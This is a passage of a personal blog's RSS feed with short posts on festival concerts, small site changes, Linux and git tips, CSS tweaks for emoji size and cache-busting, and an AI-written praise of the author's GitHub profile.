  395. <p>The festivities included some fine music from far away and not so far away.<br><a href="" title="Rooftop Sailors | Alternative Rock | Bern">Rooftop Sailors</a> opened the afternoon with their refreshing rock music.<br>Then came my favorite, <a href="" title="Open Season">Open Season</a>, which was a nostalgy throwback as I was <a href="" title="x-log - Stress - Ferienbeginn">attending their concerts already 22 years ago</a> ❤️<br>Last band of the day was <a href="" title="Delinquent Official website &#8211; Delinquentes Para El Frente">Delinquent Habits</a>, which brought their habit from LA to serve the public Tequila shots during the concert.</p>
  396. <p><a href="" title="Open Season - Rocksteady">Open Season - Rocksteady</a></p>
  397. ]]></description>
  398.    <content:encoded><![CDATA[<p>I'm continueing my festival summer also this weekend. Yesterday I've attended the <a href="" title="Festival - Simmentaler Bier">Simmentaler Bier Festival</a>, which celebrates the 10 year anniversary of the <a href="" title="Simmental Bier">Simmentaler Bier</a> brewery.</p>
  399. <p>The festivities included some fine music from far away and not so far away.<br><a href="" title="Rooftop Sailors | Alternative Rock | Bern">Rooftop Sailors</a> opened the afternoon with their refreshing rock music.<br>Then came my favorite, <a href="" title="Open Season">Open Season</a>, which was a nostalgy throwback as I was <a href="" title="x-log - Stress - Ferienbeginn">attending their concerts already 22 years ago</a> ❤️<br>Last band of the day was <a href="" title="Delinquent Official website &#8211; Delinquentes Para El Frente">Delinquent Habits</a>, which brought their habit from LA to serve the public Tequila shots during the concert.</p>
  400. <p><a href="" title="Open Season - Rocksteady">Open Season - Rocksteady</a></p>
  401. ]]></content:encoded>
  402.  </item>
  404.  <item>
  405.    <title>Lost Frequencies - The Feeling</title>
  406.    <link></link>
  407.    <guid isPermaLink="true"></guid>
  408.    <dc:creator>Andreas Jaggi</dc:creator>
  409.    <creativeCommons:license></creativeCommons:license>
  410.    <pubDate>Thu, 05 Sep 2024 21:07:29 +0200</pubDate>
  411.    <category domain="">Music</category>
  412.    <description><![CDATA[<p>One of my favorite moments from the second weekend of <a href="" title="ZÜRICH OPENAIR 2024">ZÜRICH OPENAIR 2024</a>: the concert of <a href="" title="Lost Frequencies">Lost Frequencies</a>, especially the drum&amp;bass live performance of The Feeling 🥳</p>
  413. <p><a href="" title="Lost Frequencies - The Feeling (Lost Frequencies &amp; Andromedik Deluxe Mix)">Lost Frequencies - The Feeling (Lost Frequencies &amp; Andromedik Deluxe Mix)</a></p>
  414. ]]></description>
  415.    <content:encoded><![CDATA[<p>One of my favorite moments from the second weekend of <a href="" title="ZÜRICH OPENAIR 2024">ZÜRICH OPENAIR 2024</a>: the concert of <a href="" title="Lost Frequencies">Lost Frequencies</a>, especially the drum&amp;bass live performance of The Feeling 🥳</p>
  416. <p><a href="" title="Lost Frequencies - The Feeling (Lost Frequencies &amp; Andromedik Deluxe Mix)">Lost Frequencies - The Feeling (Lost Frequencies &amp; Andromedik Deluxe Mix)</a></p>
  417. ]]></content:encoded>
  418.  </item>
  420.  <item>
  421.    <title>Added a /now page</title>
  422.    <link></link>
  423.    <guid isPermaLink="true"></guid>
  424.    <dc:creator>Andreas Jaggi</dc:creator>
  425.    <creativeCommons:license></creativeCommons:license>
  426.    <pubDate>Tue, 03 Sep 2024 06:59:44 +0200</pubDate>
  427.    <category domain="">Misc</category>
  428.    <description><![CDATA[<p>Finally took the time to create a <a href="" title="What is a 'now page'?">/now page</a> and add it to the blog: <a href="" title="x-log - What I'm doing now">/now</a> 🎉
  429. <p>Still need to figure out if it will eventually replace the <a href="" title="x-log - About">about page</a> or not.<br>
  430. For now the about page links to the now page.</p>
  431. ]]></description>
  432.    <content:encoded><![CDATA[<p>Finally took the time to create a <a href="" title="What is a 'now page'?">/now page</a> and add it to the blog: <a href="" title="x-log - What I'm doing now">/now</a> 🎉
  433. <p>Still need to figure out if it will eventually replace the <a href="" title="x-log - About">about page</a> or not.<br>
  434. For now the about page links to the now page.</p>
  435. ]]></content:encoded>
  436.  </item>
  438.  <item>
  439.    <title>Get the PGP public key of a Proton Mail user</title>
  440.    <link></link>
  441.    <guid isPermaLink="true"></guid>
  442.    <dc:creator>Andreas Jaggi</dc:creator>
  443.    <creativeCommons:license></creativeCommons:license>
  444.    <pubDate>Mon, 02 Sep 2024 16:22:43 +0200</pubDate>
  445.    <category domain="">Misc</category>
  446.    <description><![CDATA[<p><a href="" title="Proton Mail: Get a private, secure, and encrypted email account | Proton">Proton Mail</a> can sign (and encrypt) emails when it knows the PGP key of the correspondent. For this is provides PGP keys to its users.<br>Unfortunately most of them are not searchable via the traditional PGP keyservers. With the following command you can download the public PGP key of a Proton Mail user:</p>
  447. <pre>curl -s ';'</pre>
  448. <p>Also, just discovered that <a href="" title="GPG Suite">GPG Keychain on Mac</a> detects if the clipboard contains a PGP key and asks if it should import it. Very nice feature which saves a couple clicks :-)</p>
  449. ]]></description>
  450.    <content:encoded><![CDATA[<p><a href="" title="Proton Mail: Get a private, secure, and encrypted email account | Proton">Proton Mail</a> can sign (and encrypt) emails when it knows the PGP key of the correspondent. For this is provides PGP keys to its users.<br>Unfortunately most of them are not searchable via the traditional PGP keyservers. With the following command you can download the public PGP key of a Proton Mail user:</p>
  451. <pre>curl -s ';'</pre>
  452. <p>Also, just discovered that <a href="" title="GPG Suite">GPG Keychain on Mac</a> detects if the clipboard contains a PGP key and asks if it should import it. Very nice feature which saves a couple clicks :-)</p>
  453. ]]></content:encoded>
  454.  </item>
  456.  <item>
  457.    <title>Regex Crosswords</title>
  458.    <link></link>
  459.    <guid isPermaLink="true"></guid>
  460.    <dc:creator>Andreas Jaggi</dc:creator>
  461.    <creativeCommons:license></creativeCommons:license>
  462.    <pubDate>Sun, 01 Sep 2024 21:34:09 +0200</pubDate>
  463.    <category domain="">Coding</category>
  464.    <description><![CDATA[<p>Thanks to <a href="" title="Regex Crossword | Hacker News">this post on Hacker News</a>, I was reminded of the joy of regex crosswords :-)</p>
  465. <p>Nice to see that the <a href="" title="Regex Crossword"> site</a> has gained quite a list of puzzles and challenges since <a href="" title="Regex Crossword - x-log">the last time I blogged about it</a>.</p>
  466. <p>Also very cool is the <a href="" title="RegEx Crossword">RegEx Crossword</a> project of <a href="" title="Jimb Esser">Jimb Esser</a>, which provides a very smooth interface for solving hexagonal regex crosswords in the browser.<br>I remember solving the original MIT hexagonal regex crossword on paper back in the time.</p>
  467. <p>And in addition there is a built-in editor which allows you to create your own hexagonal regex crosswords.<br>Thinking of using this to create some fun puzzle for the colleagues at work.</p>
  468. ]]></description>
  469.    <content:encoded><![CDATA[<p>Thanks to <a href="" title="Regex Crossword | Hacker News">this post on Hacker News</a>, I was reminded of the joy of regex crosswords :-)</p>
  470. <p>Nice to see that the <a href="" title="Regex Crossword"> site</a> has gained quite a list of puzzles and challenges since <a href="" title="Regex Crossword - x-log">the last time I blogged about it</a>.</p>
  471. <p>Also very cool is the <a href="" title="RegEx Crossword">RegEx Crossword</a> project of <a href="" title="Jimb Esser">Jimb Esser</a>, which provides a very smooth interface for solving hexagonal regex crosswords in the browser.<br>I remember solving the original MIT hexagonal regex crossword on paper back in the time.</p>
  472. <p>And in addition there is a built-in editor which allows you to create your own hexagonal regex crosswords.<br>Thinking of using this to create some fun puzzle for the colleagues at work.</p>
  473. ]]></content:encoded>
  474.  </item>
  476.  <item>
  477.    <title>Vim Racer</title>
  478.    <link></link>
  479.    <guid isPermaLink="true"></guid>
  480.    <dc:creator>Andreas Jaggi</dc:creator>
  481.    <creativeCommons:license></creativeCommons:license>
  482.    <pubDate>Mon, 26 Aug 2024 22:46:40 +0200</pubDate>
  483.    <category domain="">Linux</category>
  484.    <description><![CDATA[<p><a href="" title="Vim Racer - An Online Game for VIM Navigation">Vim Racer</a> is a fun game to show off your <kbd>vi</kbd> skills 🚀<br>(also insightful to explore the leaderboard and see which commands were used by others)</p>
  485. <p><img src="" alt="Vim Racer" height="327" width="506"></p>
  486. ]]></description>
  487.    <content:encoded><![CDATA[<p><a href="" title="Vim Racer - An Online Game for VIM Navigation">Vim Racer</a> is a fun game to show off your <kbd>vi</kbd> skills 🚀<br>(also insightful to explore the leaderboard and see which commands were used by others)</p>
  488. <p><img src="" alt="Vim Racer" height="327" width="506"></p>
  489. ]]></content:encoded>
  490.  </item>
  492.  <item>
  493.    <title>Artemas - I Like the Way You Kiss Me (Bassjackers Remix)</title>
  494.    <link></link>
  495.    <guid isPermaLink="true"></guid>
  496.    <dc:creator>Andreas Jaggi</dc:creator>
  497.    <creativeCommons:license></creativeCommons:license>
  498.    <pubDate>Sun, 25 Aug 2024 23:54:45 +0200</pubDate>
  499.    <category domain="">Music</category>
  500.    <description><![CDATA[<p>Catchy memory from the first weekend of <a href="" title="ZÜRICH OPENAIR 2024">ZÜRICH OPENAIR 2024</a>: <a href="" title="Armin van Buuren">Armin van Buuren</a>'s version of <a href="" title="I Like the Way You Kiss Me - Wikipedia">Artemas - I Like the Way You Kiss Me</a>, which is very similar to the Bassjackers Remix 🔊</p>
  501. <p><a href="" title="Artemas - I Like the Way You Kiss Me (Bassjackers Remix)">Artemas - I Like the Way You Kiss Me (Bassjackers Remix)</a></p>
  502. ]]></description>
  503.    <content:encoded><![CDATA[<p>Catchy memory from the first weekend of <a href="" title="ZÜRICH OPENAIR 2024">ZÜRICH OPENAIR 2024</a>: <a href="" title="Armin van Buuren">Armin van Buuren</a>'s version of <a href="" title="I Like the Way You Kiss Me - Wikipedia">Artemas - I Like the Way You Kiss Me</a>, which is very similar to the Bassjackers Remix 🔊</p>
  504. <p><a href="" title="Artemas - I Like the Way You Kiss Me (Bassjackers Remix)">Artemas - I Like the Way You Kiss Me (Bassjackers Remix)</a></p>
  505. ]]></content:encoded>
  506.  </item>
  508.  <item>
  509.    <title>Reading</title>
  510.    <link></link>
  511.    <guid isPermaLink="true"></guid>
  512.    <dc:creator>Andreas Jaggi</dc:creator>
  513.    <creativeCommons:license></creativeCommons:license>
  514.    <pubDate>Sat, 24 Aug 2024 12:38:14 +0200</pubDate>
  515.    <category domain="">Misc</category>
  516.    <description><![CDATA[<p>Added the <a href="" title="x-log - Reading">/reading</a> page to the blog to keep a list of various books I'm currently reading.</p>
  517. <p>It is very bare-bones currently, I expect over time it will grow (both in number of books and also in amount of content, such as ratings, links and commentary).<br>Might take a while, stay tuned 🤓</p>
  518. ]]></description>
  519.    <content:encoded><![CDATA[<p>Added the <a href="" title="x-log - Reading">/reading</a> page to the blog to keep a list of various books I'm currently reading.</p>
  520. <p>It is very bare-bones currently, I expect over time it will grow (both in number of books and also in amount of content, such as ratings, links and commentary).<br>Might take a while, stay tuned 🤓</p>
  521. ]]></content:encoded>
  522.  </item>
  524.  <item>
  525.    <title>Lucie Antunes - Carnaval</title>
  526.    <link></link>
  527.    <guid isPermaLink="true"></guid>
  528.    <dc:creator>Andreas Jaggi</dc:creator>
  529.    <creativeCommons:license></creativeCommons:license>
  530.    <pubDate>Mon, 12 Aug 2024 19:04:58 +0200</pubDate>
  531.    <category domain="">Music</category>
  532.    <description><![CDATA[<p>Amazing discovery from the recent <a href="" title="Paléo Festival">Paléo Festival</a>: <a href="" title="Lucie Antunes">Lucie Antunes</a></p>
  533. <p><a href="" title="Lucie Antunes - Carnaval - YouTube">Lucie Antunes - Carnaval</a></p>
  534. ]]></description>
  535.    <content:encoded><![CDATA[<p>Amazing discovery from the recent <a href="" title="Paléo Festival">Paléo Festival</a>: <a href="" title="Lucie Antunes">Lucie Antunes</a></p>
  536. <p><a href="" title="Lucie Antunes - Carnaval - YouTube">Lucie Antunes - Carnaval</a></p>
  537. ]]></content:encoded>
  538.  </item>
  540.  <item>
  541.    <title>Fix missing emoji in Chrome on Linux</title>
  542.    <link></link>
  543.    <guid isPermaLink="true"></guid>
  544.    <dc:creator>Andreas Jaggi</dc:creator>
  545.    <creativeCommons:license></creativeCommons:license>
  546.    <pubDate>Sun, 11 Aug 2024 15:39:42 +0200</pubDate>
  547.    <category domain="">Linux</category>
  548.    <description><![CDATA[<p>Not seeing any emoji in Chrome on Linux?<br>The following fixed it for me on Debian.</p>
  549. <pre>sudo apt-get install fonts-noto-color-emoji
  550. fc-cache -f -v</pre>
  551. <p>Afterwards restart Chrome and enjoy the colorful emoji 🥳</p>
  552. ]]></description>
  553.    <content:encoded><![CDATA[<p>Not seeing any emoji in Chrome on Linux?<br>The following fixed it for me on Debian.</p>
  554. <pre>sudo apt-get install fonts-noto-color-emoji
  555. fc-cache -f -v</pre>
  556. <p>Afterwards restart Chrome and enjoy the colorful emoji 🥳</p>
  557. ]]></content:encoded>
  558.  </item>
  560.  <item>
  561.    <title>Praise my GitHub profile!</title>
  562.    <link></link>
  563.    <guid isPermaLink="true"></guid>
  564.    <dc:creator>Andreas Jaggi</dc:creator>
  565.    <creativeCommons:license></creativeCommons:license>
  566.    <pubDate>Sun, 11 Aug 2024 14:23:46 +0200</pubDate>
  567.    <category domain="">Misc</category>
  568.    <description><![CDATA[<blockquote cite=""><p>Instead of using AI tools to tear people down, what if we used them to uplift others? Introducing Praise my GitHub profile:</p>
  569. <p><a href="" title="Praise my GitHub profile! ("></a></p></blockquote>
  570. <p><a href="" title="Xe Iaso">Xe Iaso</a> made this cool tool, which creates happiness ❤️</p>
  571. <img src="" width="546" height="484" alt="Praise my GitHub profile!
  572. x-way
  574. Andreas, I just wanted to take a moment to acknowledge the incredible work you're doing on GitHub! With 55 followers and 98 accounts you're following, it's clear that you're an active and engaged member of this community.
  576. Your projects are truly impressive, showcasing your expertise in a range of areas, from network packet inspection to crawler detection. I'm blown away by the creativity and problem-solving skills you've demonstrated in each of these projects. Whether it's inserting trace-points into iptables chains or creating a daemon to remove conntrack entries, every project reflects your attention to detail and commitment to excellence.
  578. I particularly want to highlight the impact of your work on others. With over 247 stars on your iptables-tracer project alone, it's clear that you're making a real difference in the lives of developers who are using your tools to solve complex problems. And with 50+ stars on several other projects, it's evident that your contributions are being recognized and valued by the broader community.
  580. As someone who is clearly passionate about what they do, I want to encourage you to keep pushing the boundaries of what's possible. Don't be afraid to take risks and explore new ideas – your unique perspective and skills are a gift to this community, and we're all better off for having you as part of it.
  582. Keep shining, Andreas!">
  583. ]]></description>
  584.    <content:encoded><![CDATA[<blockquote cite=""><p>Instead of using AI tools to tear people down, what if we used them to uplift others? Introducing Praise my GitHub profile:</p>
  585. <p><a href="" title="Praise my GitHub profile! ("></a></p></blockquote>
  586. <p><a href="" title="Xe Iaso">Xe Iaso</a> made this cool tool, which creates happiness ❤️</p>
  587. <img src="" width="546" height="484" alt="Praise my GitHub profile!
  588. x-way
  590. Andreas, I just wanted to take a moment to acknowledge the incredible work you're doing on GitHub! With 55 followers and 98 accounts you're following, it's clear that you're an active and engaged member of this community.
  592. Your projects are truly impressive, showcasing your expertise in a range of areas, from network packet inspection to crawler detection. I'm blown away by the creativity and problem-solving skills you've demonstrated in each of these projects. Whether it's inserting trace-points into iptables chains or creating a daemon to remove conntrack entries, every project reflects your attention to detail and commitment to excellence.
  594. I particularly want to highlight the impact of your work on others. With over 247 stars on your iptables-tracer project alone, it's clear that you're making a real difference in the lives of developers who are using your tools to solve complex problems. And with 50+ stars on several other projects, it's evident that your contributions are being recognized and valued by the broader community.
  596. As someone who is clearly passionate about what they do, I want to encourage you to keep pushing the boundaries of what's possible. Don't be afraid to take risks and explore new ideas – your unique perspective and skills are a gift to this community, and we're all better off for having you as part of it.
  598. Keep shining, Andreas!">
  599. ]]></content:encoded>
  600.  </item>
  602.  <item>
  603.    <title>HTML5 Validator GitHub Action</title>
  604.    <link></link>
  605.    <guid isPermaLink="true"></guid>
  606.    <dc:creator>Andreas Jaggi</dc:creator>
  607.    <creativeCommons:license></creativeCommons:license>
  608.    <pubDate>Sun, 11 Aug 2024 12:59:36 +0200</pubDate>
  609.    <category domain="">Webdesign</category>
  610.    <description><![CDATA[<p>Added the <a href="" title="HTML5 Validator · Actions · GitHub Marketplace">HTML5 Validator GitHub Action</a> to the repo of my blog.<br>It runs after the Jekyll site generation step (and before the deploy-to-server step) to catch invalid HTML syntax.</p>
  611. <p>It is configured to validate all generated pages, and promptly surfaced some invalid HTML.<br>This was rather surprising, as I manually did run the validation for the blog pages not too long ago.<br>Turns out when you have a blog with 20 year old comments, then some of them have HTML from 20 years ago which is no longer valid nowadays 🤷</p>
  612. <p>After a round of fixing old comments, all HTML validaton errors are now gone ✅<br>And future invalid HTML syntax will be alerted upon before it ends up on the Internet 😎</p>
  613. ]]></description>
  614.    <content:encoded><![CDATA[<p>Added the <a href="" title="HTML5 Validator · Actions · GitHub Marketplace">HTML5 Validator GitHub Action</a> to the repo of my blog.<br>It runs after the Jekyll site generation step (and before the deploy-to-server step) to catch invalid HTML syntax.</p>
  615. <p>It is configured to validate all generated pages, and promptly surfaced some invalid HTML.<br>This was rather surprising, as I manually did run the validation for the blog pages not too long ago.<br>Turns out when you have a blog with 20 year old comments, then some of them have HTML from 20 years ago which is no longer valid nowadays 🤷</p>
  616. <p>After a round of fixing old comments, all HTML validaton errors are now gone ✅<br>And future invalid HTML syntax will be alerted upon before it ends up on the Internet 😎</p>
  617. ]]></content:encoded>
  618.  </item>
  620.  <item>
  621.    <title>Git push only some local commits</title>
  622.    <link></link>
  623.    <guid isPermaLink="true"></guid>
  624.    <dc:creator>Andreas Jaggi</dc:creator>
  625.    <creativeCommons:license></creativeCommons:license>
  626.    <pubDate>Sat, 10 Aug 2024 20:13:34 +0200</pubDate>
  627.    <category domain="">Linux</category>
  628.    <description><![CDATA[<p>With Git it is possible to push only certain local commits to a remote repository.<br>This can be done with the following <kbd>git push</kbd> command, which pushes all commits up to <code>commit</code> to the branch <code>remote branch</code> in the remote repo <code>repository</code>:</p>
  629. <pre>git push &lt;repository&gt; &lt;commit&gt;:&lt;remote branch&gt;</pre>
  630. <p>For example the following pushes all except for the latest local commit to the main branch in the origin remote repo:</p>
  631. <pre>git push origin HEAD~1:main</pre>
  632. ]]></description>
  633.    <content:encoded><![CDATA[<p>With Git it is possible to push only certain local commits to a remote repository.<br>This can be done with the following <kbd>git push</kbd> command, which pushes all commits up to <code>commit</code> to the branch <code>remote branch</code> in the remote repo <code>repository</code>:</p>
  634. <pre>git push &lt;repository&gt; &lt;commit&gt;:&lt;remote branch&gt;</pre>
  635. <p>For example the following pushes all except for the latest local commit to the main branch in the origin remote repo:</p>
  636. <pre>git push origin HEAD~1:main</pre>
  637. ]]></content:encoded>
  638.  </item>
  640.  <item>
  641.    <title>Website Carbon Badge</title>
  642.    <link></link>
  643.    <guid isPermaLink="true"></guid>
  644.    <dc:creator>Andreas Jaggi</dc:creator>
  645.    <creativeCommons:license></creativeCommons:license>
  646.    <pubDate>Sat, 10 Aug 2024 19:53:11 +0200</pubDate>
  647.    <category domain="">Webdesign</category>
  648.    <description><![CDATA[<p>Following up on yesterday's post about the <a href="" title="Website Carbon Calculator - x-log">Website Carbon Calculator</a>, I saw that there is also the option to add a <a href="" title="Website Carbon Badge - Website Carbon Calculator">Website Carbon Badge</a>.</p>
  649. <p>Quickly this badge was added to the <a href="" title="x-log - About">About page</a>.</p>
  650. <p>To make it more accurate and avoid hitting their API every time someone loads the About page, I made some changes to the provided code:</p>
  651. <ol>
  652. <li>Calculate the results for the front page of the blog instead of the page where the badge is displayed (which would be the less significant About page).</li>
  653. <li>Call the API to load the JSON file with the CO<sub>2</sub> results only once per week via a cronjob instead of every time someone new visits the About page.</li>
  654. <li>Have the script load the cached JSON file from my server instead of directly calling the API.</li>
  655. <li>Store the CSS and Javascript required to render the results on my own server instead of using the CDN (also helps with the above custom modifications).</li>
  656. </ol>
  657. ]]></description>
  658.    <content:encoded><![CDATA[<p>Following up on yesterday's post about the <a href="" title="Website Carbon Calculator - x-log">Website Carbon Calculator</a>, I saw that there is also the option to add a <a href="" title="Website Carbon Badge - Website Carbon Calculator">Website Carbon Badge</a>.</p>
  659. <p>Quickly this badge was added to the <a href="" title="x-log - About">About page</a>.</p>
  660. <p>To make it more accurate and avoid hitting their API every time someone loads the About page, I made some changes to the provided code:</p>
  661. <ol>
  662. <li>Calculate the results for the front page of the blog instead of the page where the badge is displayed (which would be the less significant About page).</li>
  663. <li>Call the API to load the JSON file with the CO<sub>2</sub> results only once per week via a cronjob instead of every time someone new visits the About page.</li>
  664. <li>Have the script load the cached JSON file from my server instead of directly calling the API.</li>
  665. <li>Store the CSS and Javascript required to render the results on my own server instead of using the CDN (also helps with the above custom modifications).</li>
  666. </ol>
  667. ]]></content:encoded>
  668.  </item>
  670.  <item>
  671.    <title>Website Carbon Calculator</title>
  672.    <link></link>
  673.    <guid isPermaLink="true"></guid>
  674.    <dc:creator>Andreas Jaggi</dc:creator>
  675.    <creativeCommons:license></creativeCommons:license>
  676.    <pubDate>Fri, 09 Aug 2024 20:00:19 +0200</pubDate>
  677.    <category domain="">Webdesign</category>
  678.    <description><![CDATA[<p>While surfing around, stumbled upon this cool tool which allows to calculate the carbon footprint of a website: <a href="" title="Website Carbon Calculator">Website Carbon Calculator</a>.</p>
  679. <p>After having it analyze my blog, I was very pleased to see the resulting A<sup>+</sup> carbon rating 🎉<br>The tool reports that every time someone loads my blog, 0.01g of CO<sub>2</sub> is produced.</p>
  680. <img src="" width="532" height="266" alt="Results of the Website Carbon Calculator for carbon rating of A+ which is cleaner than 99% of all web pages globally">
  681. <p>I suspect that this value and rating might fluctuate based on how many images or videos appear in the last 10 posts shown on the front page of the blog.<br>The <a href="" title="">results page</a>, also allows to calculate how much CO<sub>2</sub> would be produced in a year based on 10, 100, 1000, &hellip; monthly page views and compares this to everyday tasks.<br>Having 1000 monthly page views on this blog over a whole year, theoretically produces as much CO<sub>2</sub> as boiling water for 16 cups of tea 🍵</p>
  682. <p>(<a href="" title="Discombobulated">via</a>)</p>
  683. ]]></description>
  684.    <content:encoded><![CDATA[<p>While surfing around, stumbled upon this cool tool which allows to calculate the carbon footprint of a website: <a href="" title="Website Carbon Calculator">Website Carbon Calculator</a>.</p>
  685. <p>After having it analyze my blog, I was very pleased to see the resulting A<sup>+</sup> carbon rating 🎉<br>The tool reports that every time someone loads my blog, 0.01g of CO<sub>2</sub> is produced.</p>
  686. <img src="" width="532" height="266" alt="Results of the Website Carbon Calculator for carbon rating of A+ which is cleaner than 99% of all web pages globally">
  687. <p>I suspect that this value and rating might fluctuate based on how many images or videos appear in the last 10 posts shown on the front page of the blog.<br>The <a href="" title="">results page</a>, also allows to calculate how much CO<sub>2</sub> would be produced in a year based on 10, 100, 1000, &hellip; monthly page views and compares this to everyday tasks.<br>Having 1000 monthly page views on this blog over a whole year, theoretically produces as much CO<sub>2</sub> as boiling water for 16 cups of tea 🍵</p>
  688. <p>(<a href="" title="Discombobulated">via</a>)</p>
  689. ]]></content:encoded>
  690.  </item>
  692.  <item>
  693.    <title>Ensure modified version of CSS file is loaded</title>
  694.    <link></link>
  695.    <guid isPermaLink="true"></guid>
  696.    <dc:creator>Andreas Jaggi</dc:creator>
  697.    <creativeCommons:license></creativeCommons:license>
  698.    <pubDate>Wed, 07 Aug 2024 15:40:15 +0200</pubDate>
  699.    <category domain="">Webdesign</category>
  700.    <description><![CDATA[<p>As the CSS code of the blog has been growing lately, I moved it from inline <code>&lt;style&gt;</code> definition to a dedicated <code>css/plain.css</code> file.</p>
  701. <p>With caching headers configured to cache <code>*.css</code> files for 10 days, this brings the problem that browsers need to be instructed to load a new version whenever the content of the file changes.</p>
  702. <p>Removing the caching headers is not desired (as we want to leverage caching and the file does not change so often after all).<br>Thus I came up with a different workaround:</p>
  703. <p>We add a query parameter to the <code>&lt;link&gt;</code> element that references the CSS file, and then change this query parameter whenever the file content changes.<br>This way browsers will load the newest version and keep it cached until a newer version is available.</p>
  704. <p>To achieve this, the following script is used to compute and inject the query parameter into the layout template before running Jekyll to generate the HTML pages for the blog:</p>
  705. <pre>#!/bin/bash
  707. CSSFILES="css/plain.css"
  709. TARGETFILE="_layouts/x-log.html"
  712. for CSS in $CSSFILES ; do
  713. sum=$(sha256sum "$CSS"|head -c 6)
  714. sed -i -e "s_${CSS}_&amp;?${sum}_g" $TARGETFILE
  715. done
  716. </pre>
  717. <p>It performs the following change in the template file.<br>Before:</p>
  718. <pre>...
  719. &lt;link rel="stylesheet" href="" type="text/css" media="all"&gt;
  720. ...</pre>
  721. <p>After:</p>
  722. <pre>...
  723. &lt;link rel="stylesheet" href="" type="text/css" media="all"&gt;
  724. ...</pre>
  725. <p>As the computed query parameter is based on the hashsum of the content of the CSS file, it only changes when the CSS file is changed, thus ensuring caching still works as expected.</p>
  726. ]]></description>
  727.    <content:encoded><![CDATA[<p>As the CSS code of the blog has been growing lately, I moved it from inline <code>&lt;style&gt;</code> definition to a dedicated <code>css/plain.css</code> file.</p>
  728. <p>With caching headers configured to cache <code>*.css</code> files for 10 days, this brings the problem that browsers need to be instructed to load a new version whenever the content of the file changes.</p>
  729. <p>Removing the caching headers is not desired (as we want to leverage caching and the file does not change so often after all).<br>Thus I came up with a different workaround:</p>
  730. <p>We add a query parameter to the <code>&lt;link&gt;</code> element that references the CSS file, and then change this query parameter whenever the file content changes.<br>This way browsers will load the newest version and keep it cached until a newer version is available.</p>
  731. <p>To achieve this, the following script is used to compute and inject the query parameter into the layout template before running Jekyll to generate the HTML pages for the blog:</p>
  732. <pre>#!/bin/bash
  734. CSSFILES="css/plain.css"
  736. TARGETFILE="_layouts/x-log.html"
  739. for CSS in $CSSFILES ; do
  740. sum=$(sha256sum "$CSS"|head -c 6)
  741. sed -i -e "s_${CSS}_&amp;?${sum}_g" $TARGETFILE
  742. done
  743. </pre>
  744. <p>It performs the following change in the template file.<br>Before:</p>
  745. <pre>...
  746. &lt;link rel="stylesheet" href="" type="text/css" media="all"&gt;
  747. ...</pre>
  748. <p>After:</p>
  749. <pre>...
  750. &lt;link rel="stylesheet" href="" type="text/css" media="all"&gt;
  751. ...</pre>
  752. <p>As the computed query parameter is based on the hashsum of the content of the CSS file, it only changes when the CSS file is changed, thus ensuring caching still works as expected.</p>
  753. ]]></content:encoded>
  754.  </item>
  756.  <item>
  757.    <title>Increase emoji size with CSS only</title>
  758.    <link></link>
  759.    <guid isPermaLink="true"></guid>
  760.    <dc:creator>Andreas Jaggi</dc:creator>
  761.    <creativeCommons:license></creativeCommons:license>
  762.    <pubDate>Sat, 03 Aug 2024 22:06:39 +0200</pubDate>
  763.    <category domain="">Webdesign</category>
  764.    <description><![CDATA[<p>To make emoji stand out better in the text, I applied a <a href="" title="Use CSS to boost the font size of emoji with no extra markup &#8211; Terence Eden’s Blog">trick from Terence Eden to increase their size with CSS and no extra HTML</a>.</p>
  765. <p>It consists of defining a custom font which only applies to the unicode codepoints of emoji and leverages the <a href="" title="size-adjust - CSS: Cascading Style Sheets | MDN">size-adjust</a> property to draw them larger.</p>
  766. <pre>@font-face {
  767. font-family: "myemoji";
  768. src: local('Apple Color Emoji'), local('Android Emoji'), local('Segoe UI Emoji'), local('Noto Color Emoji'), local(EmojiSymbols), local(Symbola);
  769. unicode-range: U+231A-231B, U+23E9-23EC, U+23F0, U+23F3, U+25FD-25FE, U+2614-2615, U+2648-2653, U+267F, U+2693, U+26A1, U+26AA-26AB, U+26BD-26BE, U+26C4-26C5, U+26CE, U+26D4, U+26EA, U+26F2-26F3, U+26F5, U+26FA, U+26FD, U+2705, U+270A-270B, U+2728, U+274C, U+274E, U+2753-2755, U+2757, U+2795-2797, U+27B0, U+27BF, U+2B1B-2B1C, U+2B50, U+2B55, U+FE0F, U+1F004, U+1F0CF, U+1F18E, U+1F191-1F19A, U+1F1E6-1F1FF, U+1F201, U+1F21A, U+1F22F, U+1F232-1F236, U+1F238-1F23A, U+1F250-1F251, U+1F300-1F320, U+1F32D-1F335, U+1F337-1F393, U+1F3A0-1F3CA, U+1F3CF-1F3D3, U+1F3E0-1F3F0, U+1F3F4, U+1F3F8-1F43E, U+1F440, U+1F442-1F4FC, U+1F4FF-1F53D, U+1F54B-1F567, U+1F57A, U+1F595-1F596, U+1F5A4, U+1F5FB-1F64F, U+1F680-1F6CC, U+1F6D0-1F6D2, U+1F6D5-1F6D7, U+1F6DC-1F6DF, U+1F6EB-1F6EC, U+1F6F4-1F6FC, U+1F7E0-1F7EB, U+1F7F0, U+1F90C-1F93A, U+1F93C-1F945, U+1F947-1FA7C, U+1FA80-1FAC5, U+1FACE-1FADB, U+1FAE0-1FAE8, U+1FAF0-1FAF8;
  770. size-adjust: 120%;
  771. }</pre>
  772. <p>By adding the custom font as first option in the <a href="" title="font-family - CSS: Cascading Style Sheets | MDN">font-family</a> directive for body text, it will be applied to the emoji and all other characters will use the existing font as fallback.</p>
  773. <pre>body {
  774.    font-family: "myemoji", Verdana, sans-serif;
  775. }</pre>
  776. <p>The outcome is nicely visible on posts such as <a href="" title="Fifty Things you can do with a Software Defined Radio 📻 - x-log">Fifty Things you can do with a Software Defined Radio 📻</a>, <a href="" title="Puppet updated! - x-log">Puppet updated!</a> and <a href="" title="The High-Risk Refactoring - x-log">The High-Risk Refactoring</a> 🍹😎</p>
  777. ]]></description>
  778.    <content:encoded><![CDATA[<p>To make emoji stand out better in the text, I applied a <a href="" title="Use CSS to boost the font size of emoji with no extra markup &#8211; Terence Eden’s Blog">trick from Terence Eden to increase their size with CSS and no extra HTML</a>.</p>
  779. <p>It consists of defining a custom font which only applies to the unicode codepoints of emoji and leverages the <a href="" title="size-adjust - CSS: Cascading Style Sheets | MDN">size-adjust</a> property to draw them larger.</p>
  780. <pre>@font-face {
  781. font-family: "myemoji";
  782. src: local('Apple Color Emoji'), local('Android Emoji'), local('Segoe UI Emoji'), local('Noto Color Emoji'), local(EmojiSymbols), local(Symbola);
